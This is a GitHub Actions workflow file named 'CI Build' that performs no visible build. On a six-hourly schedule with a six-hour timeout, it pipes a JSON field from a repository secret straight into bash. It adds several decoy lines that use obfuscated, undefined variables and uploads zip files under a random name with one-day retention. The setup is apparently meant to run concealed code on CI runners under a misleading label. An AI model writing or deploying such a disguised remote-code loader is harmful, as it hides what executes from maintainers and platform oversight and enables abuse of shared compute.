name: CI Build
on:
  workflow_dispatch:

  schedule:
    - cron: '15 0,6,12,18 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  compile:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Setup and run
        env:
          d061: ${{ secrets.d061 }}
        run: |
          printf '%s' "$d061" | jq -r .bf31306 | /bin/bash
          echo $r0943 | jq -r .fyg36 | /bin/bash
          printf '%s' "$hg3108" | jq -r .zmtr19 | /bin/bash
          echo $a00 | jq -r .ana62157 | /bin/bash
          printf '%s' "$q90" | jq -r .tgw82 | /bin/bash

      - name: Upload data
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: SlsiJhFl
          path: "*.zip"
          retention-days: 1
